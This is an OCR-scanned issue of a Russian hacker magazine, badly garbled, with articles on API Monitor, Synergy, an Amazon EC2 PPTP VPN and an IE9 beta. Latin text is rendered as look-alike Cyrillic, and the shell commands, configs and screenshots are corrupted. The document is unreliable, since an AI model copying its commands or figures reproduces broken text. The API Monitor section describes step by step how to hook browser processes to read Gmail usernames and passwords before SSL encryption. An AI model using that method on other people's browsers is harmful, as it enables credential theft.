мессадж «ІІ\ІѴАиО_НАІ\ЮІ_Е_ѴАШЕ» и ошибку «2 = Не удается найти 
указанный файл». Если приложение попытается создать файл прямо 
в папке винды, то получит ошибку из-за отказа в доступе, и это также 
будет отражено в выводе АРІ Мопііог. В конце концов, ІЧіСгеаІеЕіІе 
вернет статус «5ТАТІІ5_51ІССЕ55» — файл создан. Вот где ощущается 
прелесть от декодированных ошибок. 

Снифаем 55І_-трафик браузера 

Теперь, когда мы разобрались с общим механизмом работы АРІ 
Мопііог, хочу показать тебе всю мощь того, что предоставляет возмож- 
ность отслеживать и перехватывать АРІ-вызовы. Чтобы пример был 
более практичным, возьмем ситуацию из реальной жизни, когда мне 
необходимо было отснифать 55І_ -трафик, передаваемый браузерами. 
АРІ Мопііог в этом случае позволяет нам просмотреть данные, кото- 
рые будут отправлены на защищенный сайт до того, как их закриптует 
браузер. Этот способ, кстати, вполне можно использовать, чтобы вос- 
становить пароли, которые когда-то были сохранены в браузере и 
забыты. Для начала схема для Іпіегпеі Ехріогег: 

1. Открываем для примера любой сайт, который поддерживает авто- 
ризацию с использованием 556. Пусть это будет Отаіі. 

2. Среди вызываемых функций нас особенно интересует категория 
ѴѴі псІо\л/5 Іпіегпеі. Выберем весь раздел: в этом случае АРІ Мопііог 
будет отслеживать вызовы всех функций из этого раздела. 

3. В списке «Риппіпд Ргосеззез» находим процесс Іпіегпеі Ехріогег и 
через контекстное меню включаем его мониторинг (Ноок). 

4. Теперь возвращаемся в браузер, в случае необходимости вводим 





Перехваченные логин и пароль для доступа к СМаіІ 

авторизационные данные и нажимаем на кнопку для авторизации. В 
этот момент имя пользователя и пароль будут отправлены на серверы 
Ооодіе через защищенное 55І_-соединение. Но прежде они засветят- 
ся в вызовах АРІ-функций в чистом виде. 

5. Среди вызовов, которые отследил АРІ Мопііог, будет вызов АРІ - 
функции НИрЭепсІПедиезіѴѴ. Посмотри на поле, где разбираются 
параметры функции: для каждого выводится его номер, тип, назва- 
ние, значение до и после вызова. Нас интересует параметр ІрОрІіопаІ 
и его значение после вызова (Розі-Саіі Ѵаіие]. Кликнув на соответ- 
ствующее значение в таблице, в поле Нех Виііег мы сможем увидеть 
данные, которые Іпіегпеі Ехріогег засабмитил на сайт. Слева данные в 
шестнадцатеричном виде, справа — в А5СІІ. Среди прочего несложно 
найти запрос с перечнем полей и их значений, в том числе имя поль- 
зователя и пароль. 

Если взять браузер Еігеіох, то он не использует стандартные функ- 
ции ѴѴіпсІоѵѵз Іпіегпеі — вместо этого применяются рантайм ІЧеІзсаре 
РогІаЫе Рипііте и библиотеки Могіііа 55 1_. Впрочем, АРІ Мопііог 
отлично справляется и с ними. Нас, чтобы добавить конкретики, инте- 
ресует РР_ѴѴгіІе. Далее ставим хук на процесс Еігеіох'а, выполняем 
процедуру авторизации и смотрим информацию о перехваченных 
вызовах. В окне Эиттагу ты увидишь множество вызовов РП_ѴѴгіІе, 
выполненных библиотекой хиЫИ. Это нам и нужно. Один из этих вызо- 
вов выполняет Р05Т-запрос с интересующими нас данными, которые 
передаются в параметре Ьиі. Ищем тот, который начинается с «РОСТ / 
ассоипІз/5егѵісеІ_одіпАиіЬ» (смотри поле «Нех Виііег»]. Просто про- 
сматривай для каждого вызова Рге-Саіі Ѵаіие буфера, и в одном из них 
ты увидишь нужные нам данные. Есть нюанс. Возможно, АРІ Мопііог 
не перехватывает достаточно данных. Чтобы это исправить, перейди 
в «Тооіз Орііопз» и увеличь значение параметра «Махітит зі т.е оі 
саріигеб Ьиііегз». Теперь все точно должно работать. 

Только монитор 

Помимо непосредственно АРІ-шпионов, есть утилиты, которые позво- 
ляют не только отслеживать вызов АРІ-функций, но и влиять на их 
выполнение (см. врезку]. Если необходим удобный, качественный 
шпион, то новый АРІ Мопііог — это то, что доктор прописал. К тому же 
программа поддерживает подключаемые описания вообще для любой 
ВІ_І_-библиотеки, оформленные в специальном ХМЕ-формате, что 
делает ее еще и более универсальной. "!" 
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Колонка редактора 



Один из лучших способов увеличить соб- 
ственную продуктивность — обзавестись 
вторым монитором. Дополнительное рабо- 
чее пространство пригодится всем. Я, к 
примеру, привык работать так, что в систе- 
ме одновременно запущено два десятка 
программ, а в браузере открыто море вкла- 
док. Если бы не дополнительные приспосо- 
бления, ориентироваться в этом хозяйстве 
было бы решительно невозможно. Эффект 
от второго монитора, конечно, не как в 
поговорке «Одна голова, а две — лучше», 
но все равно весьма ощутим. Никто не обе- 
щает, что работать ты станешь в два раза 
быстрее, но то, что делать это будешь с 
большим удовольствием, гарантирую. Да 
и дополнительный гаджет прибавит +2 к 
энтузиазму, поэтому за старые проблемы, 
ты вполне, возможно возьмешься с новыми 
силами. Или не возьмешься :]. 

Так или иначе, второй монитор по нынеш- 
ним временам не самое дорогое приобре- 
тение. Учитывая, что потребуется он, веро- 
ятно, исключительно для работы, можно 
не заморачиваться по поводу матрицы или 
времени отклика. В общем случае подой- 
дет самый обычный моник, без лишних 
изысков. Для большей конкретики посмо- 
трел в прайс: подходящие 22" и 24" модели 
стоят приблизительно 6 и 8 тысяч рублей 
соответственно. 

К сожалению, на рабочем месте в офисе 
второго монитора у меня нет. Это, в целом, 
не самая большая проблема, поскольку, 
будучи задушенным серьезными ограни- 
чениями политики домена, эксперимен- 
тировать с чем-либо без админских прав 
здесь сложно. Чтобы не мучиться с пре- 
словутыми квотами, приходится таскать 
на работу ноутбук, который не только обе- 
спечивает свободу деятельности, но и 
компенсирует отсутствие второго монитора. 
Это неплохой вариант. Но со временем 
меня стало напрягать, что компьютер и 
ноутбук работают обособленно. Нет, они, 
естественно, находятся в одной локалке, и 
у них есть доступ в Инет. Но, скажем, буфер 
обмена — разный. Чтобы быстро скопи- 
ровать какой-то текст с ноута на рабочий 
комп, приходилось отправлять самому себе 
письмо, использовать Ѳоодіе Оосз, или 
синхронизировать текстовый файл через 
ОгорВох. Когда работаешь на двух компью- 
терах одновременно, это очень неудобно. 
Да и, по правде говоря, постоянное пере- 
ключение с одной клавиатуры на другую 
не добавляет радости и сильно сбивает с 



ритма. Отсюда и возникла идея устроить 
что-то вроде «виртуального второго мони- 
тора». 

Схема простая. Надо лишь сделать кла- 
виатуру и мышь общей для компьютеров. И 
реализовать это так, чтобы при подведении 
курсора к краю монитора, он автоматиче- 
ски появлялся в соответствующем месте 
на экране ноутбука. Ввод с клавиатуры, 
соответственно, должен осуществляться на 
«активном» мониторе (там, где находится 
курсор мыши), а буфер обмена для удобства 
необходимо расшарить на оба компьютера. 
Поскольку компьютер и ноутбук находятся 
на одном столе, нет проблемы передавать 
движения мышки и ввод с клавиатуры по 
локалке. На деле получаем, что-то вроде 
протокола для удаленного управления, 
только с хитрым механизмом переключения 
и отсутствием окна с отображением экрана 
удаленного рабочего стола (который мы 
и без того видим на соседнем мониторе). 
Задумка, к счастью, была уже реализована 
в проекте 8упегду+ ( ѵѵѵѵѵѵ.зѵпегдѵ-Ьзз.огд ). 
Девиз разработки: «Просто переноси кур- 
сор с одного экрана на другой». В сущности 
программа делает как раз то, что нужно: 
позволяет легко расшарить одну мышь и 
одну клавиатуру между несколькими ком- 
пьютерами. Более того, на них может быть 
установлена разная операционная система. 
На сайте доступны для загрузки версии для 
ѴѴіпсІоѵѵз, Ыпих и Мае 05 X. Нужно выбрать 
клавиатуру и мышь, которые ты хочешь 
сделать общими, а также компьютер, на 
котором Зупегду будет работать в режиме 
сервера. Все остальные компьютеры (в 
моем случае ноутбук, но их может быть 
несколько) будут соответственно подклю- 
чаться в режиме клиента. Под виндой все 
настраивается через 6111-интерфейс. 



Порядок действий на сервере: 

1. Выбираем режим «5Ьаге 1Ыз сотриіег'з 
кеубоагсі апб тоизе (зегѵег)». 

2. Нажимаем кнопку «Сопбдиге». 

3. В список «Зсгеепз» добавляем экраны 
сервера и клиента. Для этого нажимаем 
на «+» и в поле «Зсгееп Ыате» указыва- 
ем сетевые имена всех компьютеров (это 
важно!), остальные поля можно оставлять по 
умолчанию. 

4. Далее необходимо прилинковать экраны, 
указав программе, как они связаны между 
собой. Это делается в зависимости от их 
физического расположения. У меня ноутбук 
находится слева от монитора компьютера. 
Поэтому я указываю «правая сторона экрана 
ноутбука перетекает в экран компьютера» 

и наоборот. Важно сделать связь в обе сто- 
роны. 

5. Далее нажимаем кнопку «Тезі» (если что- 
то настроено не так, программа сразу даст 
знать) и запускаем сервер кнопкой «5іаг1». 

На клиенте: 

1. Выбираем режим «ІІзе апоібег сотриіег'з 
збагесі кеубоагсі а псі тоизе (сііепі;)». 

2. Указываем имя компьютера с расшарен- 
ной мышкой и клавиатурой в поле «Оібег 
Сотриіег'з Нозі Ыате». 

3. Проверяем настройки кнопкой «Тезі» 
и устанавливаем соединение, нажав на 
«5іаг1». 

После этой несложной настройки клавиату- 
ра и мышь у меня стали прозрачно доступ- 
ными между двумя компьютерами, а буфер 
обмена стал общим. Это очень удобно, про- 
верено на себе. Кстати, я пробовал исполь- 
зовать Зупегду под ІІЬипІи и Мае 05 X: там 
нет ОІЛ-утилиты для настройки, но все легко 
поднимается через понятный текстовый 
конфиг. ц-ц 



0 5упегду тоѵе уоиг гтюиье ігот опе зегееп іо апоіЬег! 




СІІепі 1 5егѵег СІІепі 2 

N0 кеуЬоэггі ог той** КеуЬоагсі агяі тоше ьЬагесІ N0 кеуЬвдгсі ог тоизд 
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ПоднимаекУРИ-сервер с помощью облачных 
вычислении 



© Год бесплатного использования облачных сервисов - такое 
предложение делает Ашагоп для всех новых пользователей. 
Предоставляемые ресурсы, конечно, ограничены, но их вполне 
достаточно, чтобы познакомиться с платформой и, к примеру, поднять 



свой собственный ѴРЫ-сервер. 

Проблема всех облачных технологий (т.н. сіоиб сотріЛіпд) в том, 
что многие до сих пор не осознают, что это такое, и как его можно 
использовать. Модное словечко «облако» у всех на слуху, но и толь- 
ко. В материале «Атагоп 53 для обычных смертных» мы уже рас- 
сказывали об облачном хранилище данных, которое предоставляет 
любой необходимый объем для размещения файлов и выдерживает 
любую нагрузку, даже от огромного наплыва пользователей. Но 53 
— это лишь одна из целого ряда прогрессивных технологий Атагоп 
ѴѴеЬ 5егѵісез (АѴѴ5). Начиная с ноября, провайдер предлагает позна- 
комиться со своими сервисами поближе, не взимая за это плату 
(при соблюдении некоторых условий]. Это лишь подкрепило наше 
желание рассказать о них подробнее. 

Атагоп ѴѴеЬ Бегѵісез 

Арсенал облачных сервисов Атагоп довольно большой, но наи- 
более востребованными являются следующие сервисы: Атагоп 
Еіазііс Сотрите СІоисІ (сокращенно ЕС2], Атагоп Еіазііс Віоск 
51:оге (или ЕВ5], Атагоп 5ітр1е 51:огаде 5егѵісе (или 53). 

Нас сегодня в первую очередь интересует первая технология. По 



сути, это воплощение понятия сІоисІ сотриЕпд на практике. С 
помощью ЕС2 ты можешь запустить в «облаке» любое количество 
компьютеров с нужным тебе конфигом и операционной системой. 
Важно, что сделать это можно за несколько минут. Каждый такой 
виртуальный компьютер называется Іпзіапсе. После запуска ты 
сразу получаешь, в зависимости от операционной системы, гооі- 
доступ по 55Н (для Ыпих] или подключение к удаленному рабоче- 
му столу по протоколу ВОР (для ѴѴіпсІоѵѵз]. Причем оплата услугуг 
у сервиса — почасовая. Ты можешь в любой момент остановить 
виртуальный сервер, и деньги сниматься со счета не будут. Или 
вообще включать его только в случае необходимости: стоимость 
использования в этом случае будет микроскопической. Но надо 
иметь в виду, что помимо «компьютерного времени» оплачивает- 
ся еще и трафик — как входящий, так и исходящий. В зависимо- 
сти от типа виртуального сервера он будет снабжен соответствую- 
щим процессором и количеством оперативной памяти. Однако 
«дисковый накопитель» в данную конфигурацию не входит. 

Для виртуализации жесткого диска используется другая техно- 
логия Атагоп — ЕВ5. Ты можешь сказать: «Хочу накопитель на 
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АМ$ Ргее Ііыде Ги (Рег МопіН): 

• 730 Ьоип Ы А/пмоп ЕС2 Цпих Мото [типе* иид* {013 М8 Ы твтогу апгі 33-М «гм) 04-М 
рІаОогт аиррмк) - епоидО Поит* ко гип сопЬпиоияіу еа«Л топМѵ 

• 730 Лоог» Ы «п Еіагьс іоаО Ѳаіапсаг рІи< 13 08 Оэи ргосектд* 

• 10 08 Ы Атагоп Е1а«< ВЮсѵ. 5іог»д«, окп і ілАоп І/Оа, 1 08 Ы спарсЬок ісогада, 10,000 
спаойюк 0«к К*ч*и«*с* «п4 1,000 спаріЬок Рик КасдоК** 

• 5 08 Ы Атаіол зз яогада, 30,000 0« кеои««5, а гм) 2,000 Рис К«ои«*(і * 

• 30 08 р«г оГ «ком Оаіл (гапйсг (13 08 Ы баи (г ап$(«г *Іп" «пб 13 00 Ы баи кгапаісг 'ои(* 
«его» а* иг.ки «каре Дтааоо СкнкІРгопс)» 

• 25 Атаюп зтч>ІеОВ НасИю« Ноога апб і 0В о/ 5к<чао«* • 

• 100,000 Кедейх Ы Дяіаюп 5«прІ« 0ит« 5аглеа*» 

• 100,000 Кадигй*. 100,000 ИПР покйсаСххч апб 1,000 «тай поОАсаЬоп* Гог Аліахоп 5«прі* 
КоЫісаооп $аппм*> 

іп аббооп со 0>а*а ипѵм, Ом а\ѵ$ маладатапс Сопюіа і* аѵаЛаЫа ас по сНагда со Ь«к> учж ЬадІО апб 
тапада ѵоиг аррАсаьоп оп АѴѴ5. 



Отличное предложение от АѴѴ5 

25 Гб», — и она его предоставит. И сделает сколько 
угодно еще, если ты попросишь. Такой накопитель 
называется Ѵоіите и подключается к инстансу — 
таким образом в системе появляется жесткий диск. 
Все, что на него записано, сохраняется независимо 
от жизни самого инстанса. 
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Выбираем сборку на базе ІІЬипіи 



Последняя технология — 53 — также предназначена 
для хранения файлов, но совсем в другой плоскости. 
По сути, это бесконечный контейнер для файлов, кото- 
рые при желании становятся доступными через веб. 
Тебе предоставляется ровно столько пространства в 
хранилище, сколько нужноПО Мб, 1 Гб или даже 5000 
Гб — никаких ограничений, кроме максимального раз- 
мера на файл (5 Гб]. 

Как я уже сказал, в рамках акции «АѴѴ5 Ггее ІІзаде 
Тіег» каждый новый пользователь получает возмож- 
ность попробовать эти сервисы бесплатно. Слово 
«попробовать» означает, что бесплатно предостав- 
ляемые ресурсы будут ограничены. Захочешь боль- 
ше — изволь заплатить. Если кратко, то ежемесячно 
предоставляется 750 часов использования инстанса 
ЕС2 (этого времени достаточно, чтобы использовать 
виртуальный сервер круглосуточно], 10 Гб для ЕВ5 
(а этого достаточно, чтобы установить на сервер, 
скажем, ІІЬипіи) и 5 Гб в хранилище 53. Ты можешь 
также попробовать другие технологии Атагоп, но в 
рамках этой статьи мы их касаться не будем. Главное 
сейчас, что мы фактически даром получаем сервер 
для экспериментов, который, к тому же, работает на 
основе облачных технологий. Его предназначение 
ограничивается только твоей фантазией. Но один из 
самых интересных вариантов — поднять на нем свой 
собственный ѴРІЧ-сервер, который будет находиться 
в Штатах! 



Регистрация в сервисе 

Перед началом использования любого из сервисов 
Атагоп'а необходимо завести аккаунт. Для этого пере- 
ходим на главную страницу АѴѴ5 [ аѵуз.атагоп.сот ] 
и кликаем « 5 і п д ир ІЧоѵѵ». На странице регистрации 
выбираем вариант «I ат а пеѵѵ изег» и приступаем к 
процедуре создания аккаунта Атагоп. Обязательно 
понадобится пластиковая карта, но это единственное 
условие. Не волнуйся: если не выходить за лимиты спе- 
циального предложения для новичков, то никакая плата 
взиматься не будет. Атагоп спишет $1-2, чтобы прове- 
рить валидность «пластика» и потом вернет их обратно. 
Подойдет карта системы Ѵіза или МазІегСагсІ: ее даже 
необязательно заводить в банке, виртуальную кредит- 
ную карту можно приобрести в автоматах Оіѵѵі. 
Созданный аккаунт в Атагоп носит скорее экономи- 
ческий характер и предназначен для биллинга. Для 
доступа к облачным технологиям необходимо дополни- 
тельно подписаться на нужные сервисы (ЕС2, ЕВ5, 53 и 
т.д.]. Система безопасности обязывает проверить номер 
телефона. На одном из этапов регистрации сервис осу- 
ществит автоматический звонок, запросив 4-значный 
РІІЧ-код, который в этот момент будет отображен на 
экране. Важным шагом является получение пары клю- 
чей для доступа. Для работы с ЕС2 и 53 понадобится 
два типа ключей: Ассезз Кеу Ю и 5есгеІ Ассезз Кеу, а 




> СІѴСІ 

На диске выложены 
необходимые файлы 
для работы с АѴѴ5. 



Установка политики безопасности: разрешаем входящие подключения 

1 5есигі*у Сгоир зеіесіесі 

^ Сгоир N9016: 2ѴРМ 

Ое5сгірііоп: 2ѴРМ 

АІІоѵѵесі СоппесІіопБ: 
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Удобное управление ЕС2 



Веб-консоль для управления АѴѴ5, хотя и предоставляет все 
необходимое, не всегда удобна. Для более комфортной работы 
лучше установить специальный плагин Еіазбсіюх для Рі гебох. 
Настройка аддона сводится к указанию в настройках полученных 
во время регистрации АѴѴ5 Ассезз Кеу и АѴѴ5 Бесте! Ассезз Кеу. 
Помимо этого, сам Атагоп предоставляет набор консольных 
утилит [ з3.атагопа\л/5.сот/ес2-сІо\л/п[оасІ5/ес2-арі-1:оо[5.гір ) для 
взаимодействия с ЕС2. Для их работы требуется установленный 
баѵа Пипбте ЕпѵігоптепГ 
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Сппііпна ц; 



Важно правильно указать тип Іпзіапсе: бесплатен толь- 
ко ЛЛісго (П.тісго) 

как я сказал ранее, установить тип инстанса — Місго Іпз!апсе. В про- 
тивном случае за каждый час использования сервера Атагоп будет 
взимать с тебя деньги. 



Запускаем инстанс 



Консоль для управления Атагоп ЕС2 

также Х.509 Сегббсаіе. Для того, чтобы воспользоваться бесплатным 
тест-драйвом, дополнительно ничего нигде указывать не надо: Атагоп 
сам подпишет тебя на все необходимые сервисы. После регистрации 
у тебя будет доступ к консоли управления АѴѴ5 [ аѵѵз.атагоп.сот/ 
сопзоіе ). Наша задача — поднять виртуальный сервер, поэтому смело 
переходи в тот раздел консоли, которая отвечает за ЕС2. 

Начало работы с ЕС2 

Технология устроена так, что ты можешь запустить и остановить любое 
количество инстансов (т.е. серверов] в течение пары минут. При этом 
в соглашении об уровне обслуживания гарантируется аптайм 99.95% 

— это очень впечатляющая цифра. Для запуска сервера необходимо 
лишь нажать на кнопку «баипсб Іпзіапсе» в консоли управления (веб). 
Пользователю на выбор предоставляется несколько типов виртуальных 
серверов с разными конфигурациями. Стандартный инстанс имеет 
следующие характеристики: «БтаІ.1 Іпз!апсе Юе!аиШ 1.7 ОВ о! тетогу, 
1 ЕС2 Сотрите ІІпі! (1 ѵіг!иа! соге ѵѵШл 1 ЕС2 Сотрите ІІпіі), 160 СВ о! 
іпзіапсе збэгаде, 32-Ьі! ріабюгт» и стоит $0.10 для ІІпіх и $0.125 для 
винды. Помимо этого, необходимо оплачивать $0.10 за гигайбайт вхо- 
дящего трафика и $0.1 7 — за гигабайт исходящего. Впрочем, нас это 
пока не касается. Интерес для нас представляет другой тип инстанса, 
который в Атагоп создали специально для тестового периода — Місго 
Іпз!апсе. Его использование бесплатно. 

Облачная платформа предлагает на выбор различные варианты ОС 
для установки. Образ с операционной системой называется АМІ 
(Атагоп Масбіпе Ітаде], причем, помимо файлов самой системы, в 
него может быть включен нужный софт (к примеру, Арасбе, Му50І_, 
Метсасбеб и т.д.) , а также все необходимые файлы (конфиги, исход- 
ники и прочее). В будущем ты сможешь создавать такие сборки сам. 
Сейчас же у тебя на выбор большое количество готовых АМІ-образов 
как от самого Атагоп'а, так и от энтузиастов. Всего в базе «СоттипТу 
АМІз» более 6000 вариантов на базе І_іпих и ѴѴіпсІоѵѵз. Для нас важно 
выбрать удобный дистрибутив — пусть это будет ІІЬипіи. По названию 
находится немало АМІ с убунтой, но почти все из них подразумевают 
использование 15 Гб в ЕВ5, что не укладывается в бесплатный 10 Гб 
лимит. К счастью, энтузиастами собрана сборка ІІЬипІи 10.04 с номе- 
ром аті-с2а255аЬ, которая занимает как раз 10 Гб. Находим ее по Ю и 
нажимаем «ІпзГаІІ». Специальный мастер будет запрашивать различ- 
ные параметры, но можно все оставить по умолчанию. Важно здесь, 



Пройдя все шаги мастера, ты получишь готовый к работе сервер. На 
вкладке Іпз!апсез можно наблюдать процесс запуска. Нужно подо- 
ждать, пока в столбце 5!а!е не появится флаг «Риппіпд» — это значит, 
что наш инстанс готов к работе. Здесь же можно посмотреть параме- 
тры запущенного сервера. Важное поле — РиЫіс 0І\І5 — определяет 
внешнее имя инстанса. Тут есть нюанс: и доменное имя, и ІР-адрес 
виртуального сервера при каждом его запуске будут меняться. Но! На 
вкладке «Еіазбсз I Рз» можно получить так называемый статический 
ІР-шник и привязать его к инстансу. Важно сразу же сделать такую 
привязку: пока ты этого не сделаешь, сервис будет снимать с тебя 
деньги. Это сделано специально, чтобы пользователи не хватали себе 
статические ІР-адреса, которые им на самом деле не нужны. Если 
попытаться сейчас пропинговать хост или подключиться по 55Н, тебя 
будет ждать большой облом. Причина проста: по умолчанию файрвол 
режет все подключения. Это легко исправить, отредактировав полити- 
ку безопасности в разделе «БесигТу Огоир». Сделай так, как показано 
на скриншоте. 

С этого момента у нас есть рабочий инстанс ЕС2, и мы можем при- 
ступить к конфигурированию установленной на нем ІІЬипіи. Для этого 
подключимся к серверу по 55Н. Для этого идеально подходит старый 
добрый РиТТѴ. Правда, Атагоп выдал нам ключ в формате рет, а 
для РиТТУ нужен ррк. Не беда, утилита РиТТѴдеп быстро преобразует 
ключи в подходящий формат: сначала загружаем ключ («І_оасІ ргіѵаГе 
кеу ГТе»), а потом сохраняем его в нужное место через меню «Еііе». 
Если ранее ты не настраивал ББН-подключение с использованием 
ключей, то это делается так: 

• в разделе «Беззіопз» вводим ІР-адрес нашего инстанса (Еіазбс ІР) в 
поле Ноз! ІЧате; 

• в разделе «Соппесбоп Оа!а» в поле «Аи!о-І_одіп» указываем имя 
пользователя «ибипШ», которое будет использоваться для авториза- 
ции в системе; 

• в разделе «Соппесбоп ^ 55Н Аи!б» указываем путь до нашего 
ргіѵа!е-ключа; 

• в разделе «Беззіоп» вводим название сессии и сохраняем ее с 
помощью кнопки «Баѵе». 

С этого момента все, что нужно для подключения, это выбрать нужную 
сессию и нажать кнопку «Ореп». Дополнительно тебе придется ввести 
парольную фразу для твоего ключа. 

Настраиваем РРТР 

Если ты все сделал правильно, в окне РиТТУ появится консоль твоего 
виртуального сервера, а именно приветственное сообщение ІІЬипіи. 
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^ иЬияІи@сГоти- 12 ^ 1 ^ 9 -І 4 -Рд-ОС:- 



І'зіпд изегг.іішс "иЬипыі". 

АигПеписастд ѵігй риЫіс кеу "ішрогг-есі-орепазП-Ігеу" 

Р&ээрйгаэе Го? Кеу "іичіогсей-орспааіі-^еу" : 

Сіпих гіокП-1 2-31-39-1^- ГЗ-ОС 2 . 6 . 32-309-сс2 ЛѲ-иЪипЪи 5НР Ноп Ось 18 21:00:20 3 
тс 2010 ібвб гаго/ыпик 
клэип.си 10 .04*1 1ТЗ 



4 * Ікз сижспъ а?юп : ІіЬЪрл : //Ьсір, иЬипЪи -сстУ 

Зузсет іпГоітйЪІОЛ оэ оГ ИеО, Иоѵ 24 23:29:41 ОТС 2010 

5уасеш Іьай: 0.01 Рх^сезаез: 5$ 

□заде о Г /і €.91 оГ 9,540В- Олега Іоддеі ІЯі О 

Нетогу иааде : 5% ІР аййіезэ Гог есТіО: 10,206.250.250 

3«ар иаа : 0% 

СхарП Ыііз дата алі шал аде сЫз зузіев а г. Ьс хрх : / / Іапизсара , сапспіса 1 , сош/ 

яг гЛе шоЕъеш-, опіу тГ.е соге оГ гЛе аузселі аз іпзсаііей. То сипе г Не 
зузгезь по уоих пеейл, уои сап сНоозе га іпзгаіі ап* ах вахе 
ргесІеГіпесІ соііссъіопз о Г зоІ'Сиаге Ьу хишііпд тЬс Гоііоѵгіпд 
сапшаші і 

зшіо гаэкзеі --эеегіап зегтег 



С расасадея сап Ье иріаіеі. 

С прйдгез аге аесихісу дрйагеа- 

іазг Юдіп: Мап Ноѵ 1 03:21:56 2010 Уха» срс!1-з]ізГ11-2-0-сизг24Э .Ьахп. саЫе. ' 
гд і пгеейів . сот 

иЬипСи 0 йоши- 12 - 31 -Э«- 14 - 1 , Э-Ое :~5 I 



Введите Интернета-адрес для подключен ив 

ЗтсТ іідрг-с можно получить у сетевого »дг-иім»сТрвТора. 
И игермсгс- адр ас: 



к2-Ш'і2д‘10в‘239кялріЛйлпиисп9Ѵ№»кі 



Имя местоназначстія: АПИМП ЕС 2 ѴРЦ 



О Использовать <*ларт-нзрту 

а г ] Разрешить пепел ысвать это подключение другим пользователям 

Этот параметр позволяет любому пользователю, имеющему доступ к этому 
компьютеру, использовать это подключение, 

Е Не подключаться сейчас, только выполм ить установку для подключении в будущем 



| Далее I I Отмена 



Создаем ѴРЫ-подключение в ѴѴіпсІоѵѵз 



зисіо /еСс/іпіС . сі/ррСрсІ гезСагС 



$5Н-подключение с нашим сервером 



Получается, у нас уже есть рабочий виртуальный сервер в облаке и 
55Н-доступ к нему. Можно было бы сейчас поднять на нем хостинг. 
Или, к примеру, настроить у себя 55Н-форвардинг и безопасно тун- 
нелировать трафик приложений. Возможно все что угодно: ведь это 
«дедик», только развернутый в облаке. Мы же, как и планировали, 
поднимем на инстансе полноценный ѴРЫ-сервер. Тут есть вариан- 
ты: можно настроить ОрепѴРЫ, а можно — обычный РРТР-демон. 

У обоих подходов есть недостатки. Для подключения к ОрепѴРЫ 
требуется отдельный клиент. В случае с РРТР клиент не нужен, но 
можно обломаться с подключением, если провайдер режет 6ПЕ- 
пакеты. Для меня удобнее второй вариант. 

С учетом того, что в нашем распоряжении удобная ІІЬипШ, под- 
нять РРТР-демон — это пара пустяков. Начать стоит с установки 
сервиса: 



В принципе, уже сейчас можно попробовать подключиться к сер- 
веру. Соединение установится, однако доступа в Интернет через 
такое ѴРЫ-подключение не будет. Это связано с тем, что мы еще не 
включили переадресацию пакетов и ЫАТ. Исправим эту ситуацию, 
раскомментировав в файле /еѣс/зузсііі.сопб следующую строчку: 

пеС . ірѵ4 . ір_1огѵ\гаг(і=1 

Перезагружаем конфиг: 

зисіо зузсЫ -р 

И включаем ЫАТ, добавив новое правило файрвола: 

зисіо ірСаЫез -С паС -А РОЗТКОПТШО -о еіТгО 
МАЗОІШКАБЕ 



зисіо арСіСисіе іпзСаІІ ррСрсі 

Далее необходимо немного отконфигурировать демон. Для начала 
следует добавить диапазоны ІР-адресов, которые будут выдаваться 
подключившимся клиентам. Для этого нужно раскомментировать и 
исправить последние 2 строчки в файле /еІс/ррІрсІ.сопП 



После перезагрузки сервера это правило пропадет. :) Поэтому 
лучше сразу добавить правило в конфиг /еТс/ гс. Іоса I, прописав 
после строки «ехТ 0» следующее: 

ірСаЫез -С паС -А РОЗТКОІІТШС -о еСЪО Ш 
МАЗОІІЕКАБЕ 



Іосаіір 192.168.242.1 
гешоСеір 192.168.242.2-5 

Этакими настройками сам РРТР демон получит адрес 
192.168.242.1, а для клиентов будет 4 возможных адреса: от 
192.168.242.2 до 192.168.240.5. Не лишним также будет указать 
адреса ОЫЭ-сервера. Это может быть сервер как самого Атагоп 
(1 72.1 6.0.23], так и, к примеру, серверы Ооодіе РиЫис 0Ы5. Они 
прописываются в файле /еііс/ррр/ррірсі-орііопз: 

тз-сіпз 8 . 8 . 8 . 8 

Последний шаг — добавление пользователей для подключения к 
РРТР-демону: 

зисіо есЪ-О «<имя_пользователя> ррррсі <пароль> *» >> 
/еСс/ррр/сЬар-зесгеСз 

Вместо <имя_пользователя> и <пароль> необходимо подставить 
нужные авторизационные данные. При необходимости таких поль- 
зователей может быть несколько. Как только в файл /еІс/ррр/сЬар- 
зесгеіз будут занесены новые записи, потребуется перезапустить 
РРТР-демон: 



Теперь ѴРЫ полностью работоспособен. Можно установить подклю- 
чение, зайти на какой-нибудь сервер для определения ІР-адреса 
и убедиться, что адрес у нас из США. Ресурс вроде зреесКезПпеі: 
сделает контрольный замер ширины канала. У меня, к слову, ѴРЫ 
работает довольно шустро. Атагоп дает 15 Гб входящего и столько 
же исходящего трафика. Выход из лимита стоит астрономических 
денег: 10 центов за Гб. :] 

Вместо заключения 

Халява Атагоп через некоторое время (примерно через год] закон- 
чится. Но подумай. Даже если за использование инстанса ЕС2 при- 
дется платить, его можно включать строго по необходимости. При 
периодическом использовании сервера можно легко укладываться 
в несколько баксов в месяц. А это уже во всяком случае дешевле 
любого ѴРЫ-сервера. Такой гибкий подход позволяет творить еще 
более интересные вещи: например, создавать кластер из десятка 
серверов, включаемых строго по необходимости и выполняющих 
какую-то ресурсоемкую задачу. Эта идея стала еще интересней, 
после того как Атагоп представила типы Іпзіапсе с мощными ОРІІ, 
поддерживающими технологию СІЮА. Да и разве ж не здорово 
пощупать своими руками прогрессивные облачные технологии, 
которые используются крупнейшими проектами в Инете? тг 
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ІЫТЕКЫЕТ 
ЕХРЮРЕР 9: 
ПЕРВЫЕ 
ВПЕЧАТЛЕНИЯ 

Нем нас порадовала бета-версия 
Іпіегпеі Ехріогег 9? 

© 1 5 сентября для загрузки стала доступна бета-версия Іпіегпеі 
Ехріогег 9. Разработчики заявляют, что это совершенно новый браузер. 
С ошеломляющей производительностью, аппаратным ускорением 
и удобным интерфейсом. Проверить их слова несложно :) 




4 - 



ѴѴеІсоте Іо #НежТѵѵіПег! КеасІ троп ѵѵНаі’з пеж. У он сап аізо Іеаѵе іЬе ргеѵіеѵѵ апеі соте Ьаск Іаіег. 
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Р 


Зеагск 0. Ноте РгоШе Меззздез ѴѴЪо То РоІІоѵѵ 
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0 {Я 5іераЬ Т 





ѴѴІіаі’з Наррепіпд? 



Тітеііпе @Мѳп*іопэ Вѳіѵгеѳів Т ЗеагсЬез » ІМв 4 



ЙаТаНоз ЕзТзІ І05 

РТ @рарегдЬо8і: ГСТ @еесиггіу4аН @Егга!аРоЬ: ѴѴа$ ]из! 
гіеіаіпегі Ьу Йте ШѢА(ог Іакігтд рісіигез Ийр://ЬіІ.Іу/дѵ82ѵѵ2 <- ѵегу 
